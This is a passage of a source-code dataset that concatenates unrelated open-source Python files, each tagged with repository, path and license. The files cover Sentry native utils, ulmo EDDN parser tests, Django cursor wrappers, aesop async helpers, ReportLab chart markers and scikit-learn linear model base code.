app_context.get('app_identifier', None),
app_context.get('app_version', None),
app_context.get('app_build', None),
app_context.get('app_name', None),
)
return None
def rebase_addr(instr_addr, img):
return parse_addr(instr_addr) - parse_addr(img['image_addr'])
def sdk_info_to_sdk_id(sdk_info):
if sdk_info is None:
return None
rv = '%s_%d.%d.%d' % (
sdk_info['sdk_name'],
sdk_info['version_major'],
sdk_info['version_minor'],
sdk_info['version_patchlevel'],
)
build = sdk_info.get('build')
if build is not None:
rv = '%s_%s' % (rv, build)
return rv
|
JackDanger/sentry
|
src/sentry/lang/native/utils.py
|
Python
|
bsd-3-clause
| 5,739
|
from datetime import datetime
import pandas as pd
from pandas.util.testing import assert_frame_equal
import ulmo
import ulmo.usgs.eddn.parsers as parsers
import test_util
fmt = '%y%j%H%M%S'
message_test_sets = [
{
'dcp_address': 'C5149430',
'number_of_lines': 4,
'parser': 'twdb_stevens',
'first_row_message_timestamp_utc': datetime.strptime('13305152818', fmt),
},
{
'dcp_address': 'C514D73A',
'number_of_lines': 4,
'parser': 'twdb_sutron',
'first_row_message_timestamp_utc': datetime.strptime('13305072816', fmt),
},
{
'dcp_address': 'C516C1B8',
'number_of_lines': 28,
'parser': 'stevens',
'first_row_message_timestamp_utc': datetime.strptime('13305134352', fmt),
}
]
def test_parse_dcp_message_number_of_lines():
for test_set in message_test_sets:
dcp_data_file = 'usgs/eddn/' + test_set['dcp_address'] + '.txt'
with test_util.mocked_urls(dcp_data_file):
data = ulmo.usgs.eddn.get_data(test_set['dcp_address'])
assert len(data) == test_set['number_of_lines']
def test_parse_dcp_message_timestamp():
for test_set in message_test_sets:
dcp_data_file = 'usgs/eddn/' + test_set['dcp_address'] + '.txt'
with test_util.mocked_urls(dcp_data_file):
data = ulmo.usgs.eddn.get_data(test_set['dcp_address'])
assert data['message_timestamp_utc'][-1] == test_set['first_row_message_timestamp_utc']
multi_message_test_sets = [
{
'dcp_address': 'C5149430',
'data_files': {
'.*DRS_UNTIL=now.*':'usgs/eddn/C5149430_file1.txt',
'.*DRS_UNTIL=2013%2F294.*':'usgs/eddn/C5149430_file2.txt',
'.*DRS_UNTIL=2013%2F207.*':'usgs/eddn/C5149430_file3.txt'
},
'first_row_message_timestamp_utc': datetime.strptime('14016152818', fmt),
'last_row_message_timestamp_utc': datetime.strptime('13202032818', fmt),
'number_of_lines': 360,
'start': 'P365D'
}
]
def test_multi_message_download():
for test_set in multi_message_test_sets:
with test_util.mocked_urls(test_set['data_files']):
data = ulmo.usgs.eddn.get_data(test_set['dcp_address'], start=test_set['start'])
assert data['message_timestamp_utc'][-1] == test_set['first_row_message_timestamp_utc']
assert data['message_timestamp_utc'][0] == test_set['last_row_message_timestamp_utc']
assert len(data) == test_set['number_of_lines']
twdb_stevens_test_sets = [
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"BV:11.9 193.76$ 193.70$ 193.62$ 193.54$ 193.49$ 193.43$ 193.37$ 199.62$ 200.51$ 200.98$ 195.00$ 194.33$ ',
'return_value': [
['2013-10-30 04:00:00', pd.np.nan, 193.76],
['2013-10-30 05:00:00', pd.np.nan, 193.70],
['2013-10-30 06:00:00', pd.np.nan, 193.62],
['2013-10-30 07:00:00', pd.np.nan, 193.54],
['2013-10-30 08:00:00', pd.np.nan, 193.49],
['2013-10-30 09:00:00', pd.np.nan, 193.43],
['2013-10-30 10:00:00', pd.np.nan, 193.37],
['2013-10-30 11:00:00', pd.np.nan, 199.62],
['2013-10-30 12:00:00', pd.np.nan, 200.51],
['2013-10-30 13:00:00', pd.np.nan, 200.98],
['2013-10-30 14:00:00', pd.np.nan, 195.00],
['2013-10-30 15:00:00', 11.9, 194.33],
],
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"BV:12.6 Channel:5 Time:28 +304.63 +304.63 +304.63 +304.56 +304.63 +304.63 +304.63 +304.63 +304.63 +304.63 +304.63 +304.71 Channel:6 Time:28 +310.51 +310.66 +310.59 +310.51 +310.51 +310.59 +310.59 +310.51 +310.66 +310.51 +310.66 +310.59 ',
'return_value': [
['2013-10-30 04:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 05:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 06:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 07:00:00', '5', '28', pd.np.nan, 304.56],
['2013-10-30 08:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 09:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 10:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 11:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 12:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 13:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 14:00:00', '5', '28', pd.np.nan, 304.63],
['2013-10-30 15:00:00', '5', '28', 12.6, 304.71],
['2013-10-30 04:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 05:00:00', '6', '28', pd.np.nan, 310.66],
['2013-10-30 06:00:00', '6', '28', pd.np.nan, 310.59],
['2013-10-30 07:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 08:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 09:00:00', '6', '28', pd.np.nan, 310.59],
['2013-10-30 10:00:00', '6', '28', pd.np.nan, 310.59],
['2013-10-30 11:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 12:00:00', '6', '28', pd.np.nan, 310.66],
['2013-10-30 13:00:00', '6', '28', pd.np.nan, 310.51],
['2013-10-30 14:00:00', '6', '28', pd.np.nan, 310.66],
['2013-10-30 15:00:00', '6', '28', 12.6, 310.59],
]
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"BV:12.6 ',
'return_value': pd.DataFrame()
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': """ 79."$}X^pZBF8iB~i>>Xmj[bvr^Zv%JXl,DU=l{uu[ t(
|@2q^sjS!
""",
'return_value': pd.DataFrame()
},
]
def test_parser_twdb_stevens():
for test_set in twdb_stevens_test_sets:
print 'testing twdb_stevens parser'
if isinstance(test_set['return_value'], pd.DataFrame):
parser = getattr(parsers, 'twdb_stevens')
assert_frame_equal(pd.DataFrame(), parser(test_set))
return
if len(test_set['return_value'][0]) == 3:
columns = ['timestamp_utc', 'battery_voltage', 'water_level']
else:
columns = ['timestamp_utc', 'channel', 'time', 'battery_voltage', 'water_level']
_assert(test_set, columns, 'twdb_stevens')
twdb_sutron_test_sets = [
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '":Sense01 60 #60 -67.84 -66.15 -67.73 -67.81 -66.42 -68.45 -68.04 -67.87 -71.53 -73.29 -70.55 -72.71 :BL 13.29',
'return_value': [
['2013-10-30 04:00:00', 'sense01', pd.np.nan, 72.71],
['2013-10-30 05:00:00', 'sense01', pd.np.nan, 70.55],
['2013-10-30 06:00:00', 'sense01', pd.np.nan, 73.29],
['2013-10-30 07:00:00', 'sense01', pd.np.nan, 71.53],
['2013-10-30 08:00:00', 'sense01', pd.np.nan, 67.87],
['2013-10-30 09:00:00', 'sense01', pd.np.nan, 68.04],
['2013-10-30 10:00:00', 'sense01', pd.np.nan, 68.45],
['2013-10-30 11:00:00', 'sense01', pd.np.nan, 66.42],
['2013-10-30 12:00:00', 'sense01', pd.np.nan, 67.81],
['2013-10-30 13:00:00', 'sense01', pd.np.nan, 67.73],
['2013-10-30 14:00:00', 'sense01', pd.np.nan, 66.15],
['2013-10-30 15:00:00', 'sense01', 13.29, 67.84],
],
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '":OTT 703 60 #60 -231.47 -231.45 -231.44 -231.45 -231.47 -231.50 -231.51 -231.55 -231.56 -231.57 -231.55 -231.53 :6910704 60 #60 -261.85 -261.83 -261.81 -261.80 -261.81 -261.83 -261.85 -261.87 -261.89 -261.88 -261.86 -261.83 :BL 13.21',
'return_value': [
['2013-10-30 04:00:00', 'ott 703', pd.np.nan, 231.53],
['2013-10-30 05:00:00', 'ott 703', pd.np.nan, 231.55],
['2013-10-30 06:00:00', 'ott 703', pd.np.nan, 231.57],
['2013-10-30 07:00:00', 'ott 703', pd.np.nan, 231.56],
['2013-10-30 08:00:00', 'ott 703', pd.np.nan, 231.55],
['2013-10-30 09:00:00', 'ott 703', pd.np.nan, 231.51],
['2013-10-30 10:00:00', 'ott 703', pd.np.nan, 231.50],
['2013-10-30 11:00:00', 'ott 703', pd.np.nan, 231.47],
['2013-10-30 12:00:00', 'ott 703', pd.np.nan, 231.45],
['2013-10-30 13:00:00', 'ott 703', pd.np.nan, 231.44],
['2013-10-30 14:00:00', 'ott 703', pd.np.nan, 231.45],
['2013-10-30 15:00:00', 'ott 703', 13.21, 231.47],
['2013-10-30 04:00:00', '6910704', pd.np.nan, 261.83],
['2013-10-30 05:00:00', '6910704', pd.np.nan, 261.86],
['2013-10-30 06:00:00', '6910704', pd.np.nan, 261.88],
['2013-10-30 07:00:00', '6910704', pd.np.nan, 261.89],
['2013-10-30 08:00:00', '6910704', pd.np.nan, 261.87],
['2013-10-30 09:00:00', '6910704', pd.np.nan, 261.85],
['2013-10-30 10:00:00', '6910704', pd.np.nan, 261.83],
['2013-10-30 11:00:00', '6910704', pd.np.nan, 261.81],
['2013-10-30 12:00:00', '6910704', pd.np.nan, 261.80],
['2013-10-30 13:00:00', '6910704', pd.np.nan, 261.81],
['2013-10-30 14:00:00', '6910704', pd.np.nan, 261.83],
['2013-10-30 15:00:00', '6910704', 13.21, 261.85],
]
},
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': '"\r\n// \r\n// \r\n// \r\n// \r\n// \r\n-199.88 \r\n-199.92 \r\n-199.96 \r\n-199.98 \r\n-200.05 \r\n-200.09 \r\n-200.15',
'return_value': [
['2013-10-30 04:00:00', pd.np.nan, 200.15],
['2013-10-30 05:00:00', pd.np.nan, 200.09],
['2013-10-30 06:00:00', pd.np.nan, 200.05],
['2013-10-30 07:00:00', pd.np.nan, 199.98],
['2013-10-30 08:00:00', pd.np.nan, 199.96],
['2013-10-30 09:00:00', pd.np.nan, 199.92],
['2013-10-30 10:00:00', pd.np.nan, 199.88],
['2013-10-30 11:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 12:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 13:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 14:00:00', pd.np.nan, pd.np.nan],
['2013-10-30 15:00:00', pd.np.nan, pd.np.nan],
],
},
]
def test_parser_twdb_sutron():
for test_set in twdb_sutron_test_sets:
print 'testing twdb_sutron parser'
if len(test_set['return_value'][0]) == 3:
columns = ['timestamp_utc', 'battery_voltage', 'water_level']
else:
columns = ['timestamp_utc', 'channel', 'battery_voltage', 'water_level']
_assert(test_set, columns, 'twdb_sutron')
twdb_texuni_test_sets = [
{
'message_timestamp_utc': datetime(2013,10,30,15,28,18),
'dcp_message': ' \r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.8,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-110.0,\r\n+0.000,-110.0,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-109.9,\r\n+0.000,-110.0,\r\n+0.000,-110.0,\r\n+0.000,-110.0,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+0.000,-110.1,\r\n+340.0,+2013.,+307.0,+1400.,+12.07,+0.000,-109.9,-109.8,-110.1,+30.57,',
'return_value': [
['2013-10-29 16:00:00', pd.np.nan, 109.8],
['2013-10-29 17:00:00', pd.np.nan, 109.8],
['2013-10-29 18:00:00', pd.np.nan, 109.8],
['2013-10-29 19:00:00', pd.np.nan, 109.8],
['2013-10-29 20:00:00', pd.np.nan, 109.8],
['2013-10-29 21:00:00', pd.np.nan, 109.9],
['2013-10-29 22:00:00', pd.np.nan, 109.9],
['2013-10-29 23:00:00', pd.np.nan, 109.9],
['2013-10-30 00:00:00', pd.np.nan, 109.9],
['2013-10-30 01:00:00', pd.np.nan, 109.9],
['2013-10-30 02:00:00', pd.np.nan, 110.0],
['2013-10-30 03:00:00', pd.np.nan, 110.0],
['2013-10-30 04:00:00', pd.np.nan, 109.9],
['2013-10-30 05:00:00', pd.np.nan, 109.9],
['2013-10-30 06:00:00', pd.np.nan, 109.9],
['2013-10-30 07:00:00', pd.np.nan, 109.9],
['2013-10-30 08:00:00', pd.np.nan, 110.0],
['2013-10-30 09:00:00', pd.np.nan, 110.0],
['2013-10-30 10:00:00', pd.np.nan, 110.0],
['2013-10-30 11:00:00', pd.np.nan, 110.1],
['2013-10-30 12:00:00', pd.np.nan, 110.1],
['2013-10-30 13:00:00', pd.np.nan, 110.1],
['2013-10-30 14:00:00', pd.np.nan, 110.1],
['2013-10-30 15:00:00', pd.np.nan, 110.1],
]
},
]
def test_parser_twdb_texuni():
for test_set in twdb_texuni_test_sets:
print 'testing twdb_texuni parser'
columns = ['timestamp_utc', 'battery_voltage', 'water_level']
_assert(test_set, columns, 'twdb_texuni')
def _assert(test_set, columns, parser):
expected = pd.DataFrame(test_set['return_value'], columns=columns)
expected.index = pd.to_datetime(expected['timestamp_utc'])
del expected['timestamp_utc']
parser = getattr(parsers, parser)
df = parser(test_set)
# to compare pandas dataframes, columns must be in same order
if 'channel' in df.columns:
for channel in pd.np.unique(df['channel']):
df_c = df[df['channel']==channel]
expected_c = expected[expected['channel']==channel]
assert_frame_equal(df_c.sort(axis=1).sort(axis=0), expected_c.sort(axis=1).sort(axis=0))
else:
assert_frame_equal(df.sort(axis=1).sort(axis=0), expected.sort(axis=1).sort(axis=0))
|
nathanhilbert/ulmo
|
test/usgs_eddn_test.py
|
Python
|
bsd-3-clause
| 13,809
|
import datetime
import decimal
import hashlib
import logging
from time import time
from django.conf import settings
from django.utils.encoding import force_bytes
from django.utils.timezone import utc
logger = logging.getLogger('django.db.backends')
class CursorWrapper:
def __init__(self, cursor, db):
self.cursor = cursor
self.db = db
WRAP_ERROR_ATTRS = frozenset(['fetchone', 'fetchmany', 'fetchall', 'nextset'])
def __getattr__(self, attr):
cursor_attr = getattr(self.cursor, attr)
if attr in CursorWrapper.WRAP_ERROR_ATTRS:
return self.db.wrap_database_errors(cursor_attr)
else:
return cursor_attr
def __iter__(self):
with self.db.wrap_database_errors:
for item in self.cursor:
yield item
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
# Close instead of passing through to avoid backend-specific behavior
# (#17671). Catch errors liberally because errors in cleanup code
# aren't useful.
try:
self.close()
except self.db.Database.Error:
pass
# The following methods cannot be implemented in __getattr__, because the
# code must run when the method is invoked, not just when it is accessed.
def callproc(self, procname, params=None):
self.db.validate_no_broken_transaction()
with self.db.wrap_database_errors:
if params is None:
return self.cursor.callproc(procname)
else:
return self.cursor.callproc(procname, params)
def execute(self, sql, params=None):
self.db.validate_no_broken_transaction()
with self.db.wrap_database_errors:
if params is None:
return self.cursor.execute(sql)
else:
return self.cursor.execute(sql, params)
def executemany(self, sql, param_list):
self.db.validate_no_broken_transaction()
with self.db.wrap_database_errors:
return self.cursor.executemany(sql, param_list)
class CursorDebugWrapper(CursorWrapper):
# XXX callproc isn't instrumented at this time.
def execute(self, sql, params=None):
start = time()
try:
return super(CursorDebugWrapper, self).execute(sql, params)
finally:
stop = time()
duration = stop - start
sql = self.db.ops.last_executed_query(self.cursor, sql, params)
self.db.queries_log.append({
'sql': sql,
'time': "%.3f" % duration,
})
logger.debug(
'(%.3f) %s; args=%s', duration, sql, params,
extra={'duration': duration, 'sql': sql, 'params': params}
)
def executemany(self, sql, param_list):
start = time()
try:
return super(CursorDebugWrapper, self).executemany(sql, param_list)
finally:
stop = time()
duration = stop - start
try:
times = len(param_list)
except TypeError: # param_list could be an iterator
times = '?'
self.db.queries_log.append({
'sql': '%s times: %s' % (times, sql),
'time': "%.3f" % duration,
})
logger.debug(
'(%.3f) %s; args=%s', duration, sql, param_list,
extra={'duration': duration, 'sql': sql, 'params': param_list}
)
###############################################
# Converters from database (string) to Python #
###############################################
def typecast_date(s):
return datetime.date(*map(int, s.split('-'))) if s else None # returns None if s is null
def typecast_time(s): # does NOT store time zone information
if not s:
return None
hour, minutes, seconds = s.split(':')
if '.' in seconds: # check whether seconds have a fractional part
seconds, microseconds = seconds.split('.')
else:
microseconds = '0'
return datetime.time(int(hour), int(minutes), int(seconds), int((microseconds + '000000')[:6]))
def typecast_timestamp(s): # does NOT store time zone information
# "2005-07-29 15:48:00.590358-05"
# "2005-07-29 09:56:00-05"
if not s:
return None
if ' ' not in s:
return typecast_date(s)
d, t = s.split()
# Extract timezone information, if it exists. Currently we just throw
# it away, but in the future we may make use of it.
if '-' in t:
t, tz = t.split('-', 1)
tz = '-' + tz
elif '+' in t:
t, tz = t.split('+', 1)
tz = '+' + tz
else:
tz = ''
dates = d.split('-')
times = t.split(':')
seconds = times[2]
if '.' in seconds: # check whether seconds have a fractional part
seconds, microseconds = seconds.split('.')
else:
microseconds = '0'
tzinfo = utc if settings.USE_TZ else None
return datetime.datetime(
int(dates[0]), int(dates[1]), int(dates[2]),
int(times[0]), int(times[1]), int(seconds),
int((microseconds + '000000')[:6]), tzinfo
)
def typecast_decimal(s):
if s is None or s == '':
return None
return decimal.Decimal(s)
###############################################
# Converters from Python to database (string) #
###############################################
def rev_typecast_decimal(d):
if d is None:
return None
return str(d)
def truncate_name(name, length=None, hash_len=4):
"""Shortens a string to a repeatable mangled version with the given length.
"""
if length is None or len(name) <= length:
return name
hsh = hashlib.md5(force_bytes(name)).hexdigest()[:hash_len]
return '%s%s' % (name[:length - hash_len], hsh)
def format_number(value, max_digits, decimal_places):
"""
Formats a number into a string with the requisite number of digits and
decimal places.
"""
if value is None:
return None
if isinstance(value, decimal.Decimal):
context = decimal.getcontext().copy()
if max_digits is not None:
context.prec = max_digits
if decimal_places is not None:
value = value.quantize(decimal.Decimal(".1") ** decimal_places, context=context)
else:
context.traps[decimal.Rounded] = 1
value = context.create_decimal(value)
return "{:f}".format(value)
if decimal_places is not None:
return "%.*f" % (decimal_places, value)
return "{:f}".format(value)
def strip_quotes(table_name):
"""
Strip quotes off of quoted table names to make them safe for use in index
names, sequence names, etc. For example '"USER"."TABLE"' (an Oracle naming
scheme) becomes 'USER"."TABLE'.
"""
has_quotes = table_name.startswith('"') and table_name.endswith('"')
return table_name[1:-1] if has_quotes else table_name
|
mattseymour/django
|
django/db/backends/utils.py
|
Python
|
bsd-3-clause
| 7,044
|
import asyncio
import os
from urllib.parse import urlparse
import aiohttp
def damerau_levenshtein(first_string, second_string):
"""Returns the Damerau-Levenshtein edit distance between two strings."""
previous = None
prev_a = None
current = [i for i, x in enumerate(second_string, 1)] + [0]
for a_pos, a in enumerate(first_string):
prev_b = None
previously_previous, previous, current = previous, current, [0] * len(second_string) + [a_pos+1]
for b_pos, b in enumerate(second_string):
cost = int(a != b)
deletion = previous[b_pos] + 1
insertion = current[b_pos-1] + 1
substitution = previous[b_pos-1] + cost
current[b_pos] = min(deletion, insertion, substitution)
if prev_b and prev_a and a == prev_b and b == prev_a and a != b:
current[b_pos] = min(current[b_pos], previously_previous[b_pos-2] + cost)
prev_b = b
prev_a = a
return current[len(second_string) - 1]
def complete(value):
"""asyncio equivalent to `twisted.internet.defer.succeed`"""
f = asyncio.Future()
f.set_result(value)
return f
roman_numeral_table = [
('M', 1000),
('CM', 900),
('D', 500),
('CD', 400),
('C', 100),
('XC', 90),
('L', 50),
('XL', 40),
('X', 10),
('IX', 9),
('V', 5),
('IV', 4),
('I', 1)
]
def int_to_roman(num):
def parts():
nonlocal num
for letter, value in roman_numeral_table:
while value <= num:
num -= value
yield letter
return ''.join(parts())
class RequestManager:
"""Gross class for managing active requests.
The only thing it really does is make sure that anything using `get()`
won't send out duplicate requests. This is useful when trying to download
metadata for new series.
"""
# FIXME: make this connection map configurable.
connection_map = {
'www.omdbapi.com': 20,
}
current_requests = {}
limits = {}
CONN_POOL = aiohttp.TCPConnector()
count = 0
@classmethod
def get_pool(cls, key):
if key not in cls.limits:
limit = cls.connection_map.get(key, 50)
cls.limits[key] = asyncio.BoundedSemaphore(limit)
return cls.limits[key]
def __init__(self, url, **kwargs):
self.url = url
self.kwargs = kwargs
self.callbacks = []
RequestManager.count += 1
@asyncio.coroutine
def run(self):
key = urlparse(self.url).netloc
p = self.get_pool(key)
with (yield from p):
response = yield from aiohttp.request('GET', self.url, connector=self.CONN_POOL, **self.kwargs)
try:
json = yield from response.json()
except Exception as e:
for cb in self.callbacks:
cb.set_exception(e)
else:
for cb in self.callbacks:
cb.set_result((response, json))
def wait_for(self):
self.callbacks.append(asyncio.Future())
return self.callbacks[-1]
def get(url, **kwargs):
full_url = url + '&'.join(sorted('='.join(kv) for kv in kwargs.get('params', {}).items()))
if full_url in RequestManager.current_requests:
return RequestManager.current_requests[full_url].wait_for()
r = RequestManager(url, **kwargs)
RequestManager.current_requests[full_url] = r
asyncio.async(r.run())
cb = r.wait_for()
@cb.add_done_callback
def callback(result):
del RequestManager.current_requests[full_url]
return r.wait_for()
def setup_logging(name, level):
from logbook import NullHandler, RotatingFileHandler, lookup_level
path = os.path.expanduser('~/.config/aesop/{}.log'.format(name))
level = lookup_level(level)
# null handler to prevent logs unhandled from RotatingFileHandler going to
# stderr
NullHandler().push_application()
RotatingFileHandler(path, level=level).push_application()
def get_language(path):
from aesop import isocodes
for suffix in path.suffixes:
suffix = suffix[1:]
try:
isoname = isocodes.isoname(suffix.title())
except KeyError:
pass
else:
return isoname
if len(suffix) not in {2, 3}:
continue
suffix = suffix.lower()
if len(suffix) == 2:
try:
suffix = isocodes.iso2to3(suffix)
except KeyError:
continue
try:
isocodes.nicename(suffix)
except KeyError:
pass
else:
return suffix
|
nathan-hoad/aesop
|
aesop/utils.py
|
Python
|
bsd-3-clause
| 4,678
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/charts/markers.py
"""
This modules defines a collection of markers used in charts.
The make* functions return a simple shape or a widget as for
the smiley.
"""
__version__=''' $Id: markers.py 2385 2004-06-17 15:26:05Z rgbecker $ '''
from reportlab.lib import colors
from reportlab.graphics.shapes import Rect, Line, Circle, Polygon
from reportlab.graphics.widgets.signsandsymbols import SmileyFace
def makeEmptySquare(x, y, size, color):
"Make an empty square marker."
d = size/2.0
rect = Rect(x-d, y-d, 2*d, 2*d)
rect.strokeColor = color
rect.fillColor = None
return rect
def makeFilledSquare(x, y, size, color):
"Make a filled square marker."
d = size/2.0
rect = Rect(x-d, y-d, 2*d, 2*d)
rect.strokeColor = color
rect.fillColor = color
return rect
def makeFilledDiamond(x, y, size, color):
"Make a filled diamond marker."
d = size/2.0
poly = Polygon((x-d,y, x,y+d, x+d,y, x,y-d))
poly.strokeColor = color
poly.fillColor = color
return poly
def makeEmptyCircle(x, y, size, color):
"Make a hollow circle marker."
d = size/2.0
circle = Circle(x, y, d)
circle.strokeColor = color
circle.fillColor = colors.white
return circle
def makeFilledCircle(x, y, size, color):
"Make a hollow circle marker."
d = size/2.0
circle = Circle(x, y, d)
circle.strokeColor = color
circle.fillColor = color
return circle
def makeSmiley(x, y, size, color):
"Make a smiley marker."
d = size
s = SmileyFace()
s.fillColor = color
s.x = x-d
s.y = y-d
s.size = d*2
return s
|
alexissmirnov/donomo
|
donomo_archive/lib/reportlab/graphics/charts/markers.py
|
Python
|
bsd-3-clause
| 1,801
|
"""
Generalized Linear models.
"""
# Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Vincent Michel <vincent.michel@inria.fr>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Mathieu Blondel <mathieu@mblondel.org>
# Lars Buitinck <L.J.Buitinck@uva.nl>
#
# License: BSD 3 clause
from __future__ import division
from abc import ABCMeta, abstractmethod
import numbers
import warnings
import numpy as np
import scipy.sparse as sp
from scipy import linalg
from scipy import sparse
from ..externals import six
from ..externals.joblib import Parallel, delayed
from ..base import BaseEstimator, ClassifierMixin, RegressorMixin
from ..utils import as_float_array, check_array, check_X_y, deprecated, column_or_1d
from ..utils.extmath import safe_sparse_dot
from ..utils.sparsefuncs import mean_variance_axis, inplace_column_scale
from ..utils.fixes import sparse_lsqr
from ..utils.validation import NotFittedError, check_is_fitted
###
### TODO: intercept for all models
### We should define a common function to center data instead of
### repeating the same code inside each fit method.
### TODO: bayesian_ridge_regression and bayesian_regression_ard
### should be squashed into its respective objects.
def sparse_center_data(X, y, fit_intercept, normalize=False):
"""
Compute information needed to center data to have mean zero along
axis 0. Be aware that X will not be centered since it would break
the sparsity, but will be normalized if asked so.
"""
if fit_intercept:
# we might require not to change the csr matrix sometimes
# store a copy if normalize is True.
# Change dtype to float64 since mean_variance_axis accepts
# it that way.
if sp.isspmatrix(X) and X.getformat() == 'csr':
X = sp.csr_matrix(X, copy=normalize, dtype=np.float64)
else:
X = sp.csc_matrix(X, copy=normalize, dtype=np.float64)
X_mean, X_var = mean_variance_axis(X, axis=0)
if normalize:
# transform variance to std in-place
# XXX: currently scaled to variance=n_samples to match center_data
X_var *= X.shape[0]
X_std = np.sqrt(X_var, X_var)
del X_var
X_std[X_std == 0] = 1
inplace_column_scale(X, 1. / X_std)
else:
X_std = np.ones(X.shape[1])
y_mean = y.mean(axis=0)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def center_data(X, y, fit_intercept, normalize=False, copy=True,
sample_weight=None):
"""
Centers data to have mean zero along axis 0. This is here because
nearly all linear models will want their data to be centered.
If sample_weight is not None, then the weighted mean of X and y
is zero, and not the mean itself
"""
X = as_float_array(X, copy)
if fit_intercept:
if isinstance(sample_weight, numbers.Number):
sample_weight = None
if sp.issparse(X):
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
else:
X_mean = np.average(X, axis=0, weights=sample_weight)
X -= X_mean
if normalize:
# XXX: currently scaled to variance=n_samples
X_std = np.sqrt(np.sum(X ** 2, axis=0))
X_std[X_std == 0] = 1
X /= X_std
else:
X_std = np.ones(X.shape[1])
y_mean = np.average(y, axis=0, weights=sample_weight)
y = y - y_mean
else:
X_mean = np.zeros(X.shape[1])
X_std = np.ones(X.shape[1])
y_mean = 0. if y.ndim == 1 else np.zeros(y.shape[1], dtype=X.dtype)
return X, y, X_mean, y_mean, X_std
def _rescale_data(X, y, sample_weight):
"""Rescale data so as to support sample_weight"""
n_samples = X.shape[0]
sample_weight = sample_weight * np.ones(n_samples)
sample_weight = np.sqrt(sample_weight)
sw_matrix = sparse.dia_matrix((sample_weight, 0),
shape=(n_samples, n_samples))
X = safe_sparse_dot(sw_matrix, X)
y = safe_sparse_dot(sw_matrix, y)
return X, y
class LinearModel(six.with_metaclass(ABCMeta, BaseEstimator)):
"""Base class for Linear Models"""
@abstractmethod
def fit(self, X, y):
"""Fit model."""
@deprecated(" and will be removed in 0.19.")
def decision_function(self, X):
"""Decision function of the linear model.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
Returns predicted values.
"""
return self._decision_function(X)
def _decision_function(self, X):
check_is_fitted(self, "coef_")
X = check_array(X, accept_sparse=['csr', 'csc', 'coo'])
return safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
def predict(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
C : array, shape = (n_samples,)
Returns predicted values.
"""
return self._decision_function(X)
_center_data = staticmethod(center_data)
def _set_intercept(self, X_mean, y_mean, X_std):
"""Set the intercept_
"""
if self.fit_intercept:
self.coef_ = self.coef_ / X_std
self.intercept_ = y_mean - np.dot(X_mean, self.coef_.T)
else:
self.intercept_ = 0.
# XXX Should this derive from LinearModel? It should be a mixin, not an ABC.
# Maybe the n_features checking can be moved to LinearModel.
class LinearClassifierMixin(ClassifierMixin):
"""Mixin for linear classifiers.
Handles prediction for sparse and dense X.
"""
def decision_function(self, X):
"""Predict confidence scores for samples.
The confidence score for a sample is the signed distance of that
sample to the hyperplane.
Parameters
----------
X : {array-like, sparse matrix}, shape = (n_samples, n_features)
Samples.
Returns
-------
array, shape=(n_samples,) if n_classes == 2 else (n_samples, n_classes)
Confidence scores per (sample, class) combination. In the binary
case, confidence score for self.classes_[1] where >0 means this
class would be predicted.
"""
if not hasattr(self, 'coef_') or self.coef_ is None:
raise NotFittedError("This %(name)s instance is not fitted "
"yet" % {'name': type(self).__name__})
X = check_array(X, accept_sparse='csr')
n_features = self.coef_.shape[1]
if X.shape[1] != n_features:
raise ValueError("X has %d features per sample; expecting %d"
% (X.shape[1], n_features))
scores = safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
return scores.ravel() if scores.shape[1] == 1 else scores
def predict(self, X):
"""Predict class labels for samples in X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Samples.
Returns
-------
C : array, shape = [n_samples]
Predicted class label per sample.
"""
scores = self.decision_function(X)
if len(scores.shape) == 1:
indices = (scores > 0).astype(np.int)
else:
